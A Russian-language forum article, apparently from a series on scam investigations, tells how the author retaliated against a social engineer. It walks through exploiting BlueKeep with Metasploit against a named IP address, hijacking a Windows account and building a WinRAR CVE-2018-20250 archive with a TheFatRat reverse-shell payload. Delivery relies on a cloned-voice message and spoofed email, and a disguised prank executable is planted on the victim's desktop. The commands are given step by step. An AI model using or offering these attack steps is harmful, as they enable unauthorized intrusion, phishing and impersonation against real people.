Пролог и его формальности
Вот здравствуйте, нет, лучше будет написать привет, но это слишком неофициально и неуважительно. Ладно. Проще говоря, я забыл как можно нормально поздороваться, поэтому обойдемся такой вот тщетщиной. Сегодня на повестке дня у нас очередной выпуск из цикла "По горячим следам", здесь вот оставлю ссылки на предыдущие пять частей:
1. По горячим следам: в попытках раскрыть мошенническую схему - Discord, ботнет да стиллеры
2. По горячим следам: расследуем мошеннические схемы - Undetected Handler и барыга-идиот
3. По горячим следам: эпизод три - не неуловимый стиллерщик и его просчеты
4. По горячим следам: эпизод четвертый - Скамер-Феликс и его тридцать три несчастья
5. По горячим следам: эпизод пять - Reverse Shell в документе, обман через Jivo и немного HTA-малварей
2. По горячим следам: расследуем мошеннические схемы - Undetected Handler и барыга-идиот
3. По горячим следам: эпизод три - не неуловимый стиллерщик и его просчеты
4. По горячим следам: эпизод четвертый - Скамер-Феликс и его тридцать три несчастья
5. По горячим следам: эпизод пять - Reverse Shell в документе, обман через Jivo и немного HTA-малварей
Я отчаянно пытался всё это время найти действительно годный способ обмана, дабы Вы смогли насладиться чем-то новым, а даже если не новым, то хотя бы в оригинальном исполнении злоумышленника и вот чего нарыл. Начало мы возьмем из предыстории, слушайте и приятного чтения Вам.
Поскольку в последнее время некие произведения японского творчества меня сильно увлекают, ловите оригинальное появление дисклеймера. Техника призыва! Дискл-е-е-ейме-е-е-ер!
Дисклеймер
На самом деле я против зла и то, что я покажу вам далее, может быть,
практически применено различного рода антагонистами. Сразу предупреждаю, что я, как автор этой писанины , снимаю с себя ответственность за то с каким умыслом будет использована эта информация дальше. Виноват только и только тот, кто применяет знания, но не тот, кто ими делится. Автор лишь преследует благие цели, используя способы и пути злоумышленников, раскрывает суть преступного механизма, открывая людям глаза, демонстрируя способы защиты, ведь лучший протект - это знания.
По горячим следам: эпизод шесть или как я взломал свою смерть - дырявый WinRar, BlueKeep, Fake Voice Multi-Tacotron и немного чертовщины
Итак, когда-то я запостил у себя во всех социальных сетях просьбу меня взломать, обмануть и так далее. Естественно, ни одного способа, который бы попал в статью среди всех предложенных вариантов не оказалось, до сегодня. По крайней мере, я считал всех своих знакомых криворукими бездарями, кстати я и сам не отличаюсь золотыми протезами вместо конечностей, но я хотя бы умею не уронить ложку, когда пытаюсь донести ту к рту, упустим это.
Значится история стартует от запуска безобидной КС 1.6, в которую я люблю поигрывать время от времени, админю значится себе спокойно, что-то пытаюсь показывать в игре и тут подключается рандомный человечек с ником “Твоя смерть”, ничего в этом такого. И вот заводит он со мной, спустя час игры , диалог, абсолютно безобидный.
Ремарочка, Смерть оказался очень даже хорошим социальным инженером и просто с эшелоном выдержки и воли в кармане.
Он добавляет меня в друзья в Стиме и на следующий день мы также пересекаемся в игре. И вот наша беседа переходит на личности, мы знакомимся, расспрашиваем друг друга, ну всё типично. Превосходный лжец, ибо в итоге оказалось, что ни единое его слово не является истиной, но об этом позже.
Тогда я ещё не подозревал, что добавил он меня лишь потому, что хотел мониторить мою активность в играх и подстраивать как-бы случайные встречи.
После оказалось, что он также является активным игроком того же сервера в SAMP, хотя эту игру я забросил, но зайти покататься уж соизволил. Тогда общались мы посредством печально известного Дискорда, в виду отсутствия игрового голосового.
Знакомство продолжалось, честно, я уж подумал, что действительно нашел человека, походящего по ходу мыслей и прошлому на себя, но он лишь подстраивался под собеседника и не более.
Кстати, куда ж без расспросов о железе, версии виндовса и так далее. Смекаете к чему это?
Прошло семь дней. Мы кое-как поддерживали общение, он умело играл свою роль. И тут я столкнулся с проблемой, уже не припомню какой, но времени на её немедленное решение у меня не было. Спросил я у Максима, кстати такое настоящее имя нашего злоумышленника, он сказал, что у него такая же беда и он попытается с ней разобраться, а я могу идти по своим делам.
Я так и поступил, по возвращению домой, он кидает мне ссылку на статью на популярном форуме и говорит, что файлик со статьи фиксит все ошибки, кстати, так-то оно и есть, только вот нюанс, с настоящего портала.
На то время я не заметил подмены сразу, ибо был заменен всего-лишь один непримечательный символ. Качаем, проводим распаковку архива, и вот наш .exe, исключительно на интуиции я зачем-то посмотрел свойства и увидел, что это SFX архив. В голове щелчок, и тут я осознаю всю картину, перехожу быстренько на тот самый портал, проверяю работоспособность других линков, да, они работают, но с переадресацией на оригинал, замечаю подмену символа в ссылке.
Класс, это черт возьми, гениально. Заливать сам SFX на Вирустотал смысла нет, но я это сделал, его процент обнаруживаемости - 0. А вот то, что находилось в нём - да. Это был больше фановый вирус, Вашему вниманию представляем ÿ.exe, да, он так и называется. Но ведь там могла быть какая-то полезная нагрузка.
Представим картину, что мы таки открыли этот архив и зловред был запущен, что будет происходить?
Мой ответ прост, какой-то лютый психоделический бред, а после вас ожидает игра в машинку на протяжении восьми часов, дабы сохранить файлы. Вообще этот вредонос был предназначен для Виндовс XP, но оказалось, что он был адаптирован Максимом под все версии, даже 10.1 (ага, я до сих пор отрицаю существования 11-ой). А на то, как же он сводит владельцев устройств с ума, поглядите видео.
Как с ним бороться? Да просто, достаточно лишь зайти в безопасный режим и удалить сие чудо из автозагрузки, а после сделать восстановление, используя рекавери точку, поэтому не советую отключать эту функцию.
После этого наш гений социальной инженерии не исчез, на моё удивление, а просто посмеялся, добавив, что таким способом обманул не одну сотню человек и обычно там не вирус-смешинка, а троян или кейллогер. А вот теперь мы улетаем в ЧС, получаем удаление со всех списков друзей и конец.
Конец истории, но не нашего противостояния, выведем же на чистую воду сие зло.
Но сперва разберемся, как же сделать такой архивчик, ладно, шучу. Все знают, как подобное сделать, ну не вижу смысла описывать подобное здесь.
Итак, поехали. Начнем, наверное, со сбора доступной информации, пытаемся выжать максимум из того, что было предоставлено самим Максимом. Первым делом Стим, познакомились ведь мы с ним сначала там.
Но я Вас разочарую, во-первых информации, помимо увлечений здесь нет, а во-вторых такие аккаунты купить очень легко. Идем дальше, Дискорд был удален, как и страница в ВК, поэтому сразу уймище зацепок мы потеряли. И тут ко мне пришла идея, которой бы выдать Оскар, Грэмми и премию Дарвина посмертно.
Он ведь заходил на сервер КС, а стало быть в истории подключений есть его айпи, звучало гениально, у меня есть доступ к файловой системе сервера, поэтому проблем не возникло. Мы получили его IP. Просто что-то слишком? Да, я также подумал, когда узнал, что это всего-то адрес ВПН-а, но тут же вспомнил, что на сервере САМП стоит фильтр подключений с VPN, а стало быть…
После связи со знакомыми администраторами и несколькими тысячами убытка, мы получаем заветные циферки - 193.105.201.59. Ну и быстрый анализ, не запуская Кали, ибо толку бы было не больше.
Теперь можем просканировать открытые порты и врубить ему стрессер! Шутка, это будет крайней мерой, но подобным заниматься я не очень и хочу.
Ой, то, что вы видите на скрине… Ну то не я, альтерэго взяло верх.
Итак, заводим нашу любимую Кали и начинаем действо. Сперва сканируем портики через zenmap:
Код:
zenmap
Результат очень удивил, ну о-о-чень. На него можете взглянуть на скрине собственно.
Единственный открытый порт - 3389, это очень занятно очень, ведь раньше я никогда не встречал “жертв” с подобным портом. Для начала давайте узнаем, что это за операционная система, очень простым путем:
Код:
rdesktop 193.105.201.59
Соглашаемся и видим окно авторизации родной семерочки версии R1. Сразу же у меня родилась идея попытаться воспользоваться один стареньким, но не очень, эксплоитом в метасплойте. Имя ему будет BlueKeep, я им пользовался в прошлом, когда мне нужны были виртуальные машины с чьим-то рабочим вмешательством.
Открываем метасплоит и ищем наш эксплоит:
Код:
msfconsole
search bluekeep
Оказалось в этой уязвимости есть ещё и свой сканер, воспользуемся, кстати недавно узнал, что если производился поиск, то не обязательно копировать название эксплоита, достаточно лишь написать так:
Код:
use 0
Затем определим параметр, отвечающий за целевую машину, прежде просмотрев опции:
Код:
show options
set rhost 193.105.201.59
run
Вразумительного ответа, уязвима ли машина мы не получили кстати. Ну просканировало и всё, поэтому переходим к непостредственно эксплуатации, веря в чудо:
Код:
use 1
Сперва выставим автоматическое определение целевой машины:
Код:
set target 0
set rhosts 193.105.201.59
exploit
Пользуясь случаем, добавлю, что полезная нагрузка нам подходит как нельзя кстати и заменять мы её не будет, но вы можете, используя :
Код:
Show payloads
И, на моё удивление, ловим сессию метерпретер, после переходим в шелл, отображаем пользователей и меняем пароль от учетки, всё как и в прошлой статье:
Код:
pwd
ls
getuid
shell
net user
net user YourDeath 1000minus7
Ну и теперь с помощью redesktop подключаемся:
Код:
redesktop 193.105.201.59
Единственное, что имеется на рабочем столе - это корзина и “Новый документ”, естественно я его открыл и чуть-чуть пришел в шок, ну вот правда.
То есть он намеренно направил нас по ложному следу, используя ВПН в КС, а там где запрещен последний, решил посидеть с выделенного сервера. Прикольно.
Выходит, что в итог мы лишены любой информации о нашем противнике, абсолютно любой. Такое произошло впервые за весь цикл наших писанин, но не беда, ведь мы ещё и неплохо умеем играть и устраивать спектакли. По мне плакал драмкружок. Кстати Стим-то он не сменил, видя где он играет, было легко пересечься с ним.
Ну и с этого момента начался длинный путь притворства и лжи от меня, делалось всё по тому же принципу, которым Максимка одурачил меня. Спустя три дня, я делаю ему вот такое предложение и скидываю ссылку на архив, а после каким-то магическим образом ловлю метерпретер на своей Кали. Как? А давайте поведаю.
Короче на второй день общения, достаточно искреннего, как мне показалось, я у него напролом спросил есть ли у него в папке с Винраром unacev2.dll, указав, что знакомый программист рекомендовал его просканировать на вирусы, ибо там могут быть какие-то зловреды. Мы с ним вместе посмеялись, но как я понял этот файлик у него имеется.
Поэтому работаем следующим образом, немного расскажу о CVE-2018-20250, которую мы сейчас используем. Это интересная уязвимость, которая в своё время была 0-day и до сих пор её толком не профиксили, точнее фикс то выпустили, но мало кто получил это обновление. А все ведь дело в том, что бесконечный пробный период имеет свои минусы, да, то самое отсутствие обновлений.
Для генерации нашего злого архива, мы будем использовать следующий репозиторий, который заблаговременно скопировали на Кали:
Код:
git clone https://github.com/DANIELVISPOBLOG/WinRar_ACE_exploit_CVE-2018-20250
cd Winrar…
python create_exploit.py
Прежде поместив в директорию со скриптом нужные файлы, а нужные файлы будут таковыми. Я не хотел морочить голову venom’ом, поэтому давайте воспользуемся старым скриптом для автоматизации его работы, всё равно, как уже я узнал он не пользуется антивирусным ПО.
Вот всё в одном коде:
Код:
git clone https://github.com/Screetsec/TheFatRat.git
cd TheFatRat
chmod +x setup.sh && ./setup.sh
FatRat
Ну и выберем единичку, а после запустим слушатель через метасплоит:
Код:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.9.83
set LPORT 6666
run
Так-с, а теперь давайте поведаю, как же я записал этому типу свой голос, но воспроизведенный программно. Дело всё в репозитории, который позволяет воспроизводить текст клонированным голосом, представляю Вашему вниманию - вот это чудо, главное ссылку не забыть вставить.
Но для его работы нужен 1 ТБ свободного места, такими ресурсами мы не располагаем, но благо имеется некая библиотека гугла, позволяющая запустить сие чудо на удаленной машине. Ничего не нужно писать самому, лишь пошагово понажимать на значок запуска да и всё. Кстати, то голосовое оставлю во вложениях, ссылался на врожденный дефект речи, если что, и Максимка поверил.
Возвращаемся к делу, теперь нам нужно создать левую почту и отправить себе же, но только на основную, письмо с паролями от якобы админки на сервере. Но с личной почты такого делать бы не хотелось, воспользуемся подменой, для этого подойдёт любой сервис.
Пишем что-то типа “Алексей, вот ваши пароли администратора” и прикрепляем архив, после уже со своей почты пересылаем нашему Максону, кстати заодно и его почту узнали, веселуха-а.
И самое смешное произошло тогда, когда он ничего не заметил. Хотя этот способ имеет явные недочеты, когда открываешь, а не быстро распаковываешь архив, то в нем находится ещё какой-то третий файл, это ведь подозрительно до мозга костей. Теперь осталось действительно просто терпеть, пока его компьютер не перезапустится, ибо эта уязвимость лишь распаковывает файл по нужному нам пути, а не запускает.
А вот дальше мой план дал очень большую трещину, я не подумал, что сразу не получу шелл, а придется ждать. Естественно никакой админки у меня не было, а в архиве были пустые текстовые файлы.
И чёрт, мне пришлось покупать админку на каком-то крупном проекте по Майнкрафту, чтобы потом просто отдать её и наша жертва не начала потрошить свой ноутбук на наличие постороннего софта.
Следующее утро, день возмездия. Перезапуск был успешно совершен и полезная нагрузка запущена, а в метасплоите… О, да! Мы видим оболочку метерпретер, приятно.
Как его можно наказать? Как и он хотел меня провести с y.exe, так и я захотел поприкалываться над ним и давайте загрузим ему на рабочий стол психодел-вирусняк duevile.exe, хотя он лишь визуальный, но ознакомиться с его действием можно, посмотрев видео ниже.
Опять переходим на шелл, прежде просмотрев, что у него на рабочем столе:
Код:
pwd
ls
getuid
shell
После переместим копированием наш вредонос, прежде заменив иконку, а оригинал на рабочем столе жертвы удалив:
Код:
rm CS:GO.lnk
cp /root/CS:GO.exe /C:\Users\YourDeath\Desktop\CSGO.exe
Ну и осталось позвать нашего другана сыграть в КСочку, да? Он сыграл, ещё как сыграл.
Последним моим сообщением для него было “А вот ты квест не прошел”. Символичная и чувственная история получилась, слегка драматичная. Мне понравилось.
Итоги
Ну вот и итоги, господа, статья подошла к концу. Знаете, с каждым разом, когда меня встречают такие вот личности, я успомняюсь в человечестве и задаюсь одним лишь вопросом. Хоть кто-то может быть честным, если даже я не могу быть честен с самим собой, как тогда быть прямодушным с другими? Но это уже плоды моих фантазий и биполярного расстройства, выводов в этом цикле особо то и нет, да и подытожить нечего. Не попадайтесь на крючки злотворцев, всем добра. А мне пора. До скорого.
А ой, забыл сказать, Максимка(YourDeath) оказался моим старым знакомым, который откликнулся на просьбу обмануть меня. Это уже выяснилось после написания статьи.
И ещё, сгенерированный голос можно послушать
Ссылка скрыта от гостей
.
Последнее редактирование: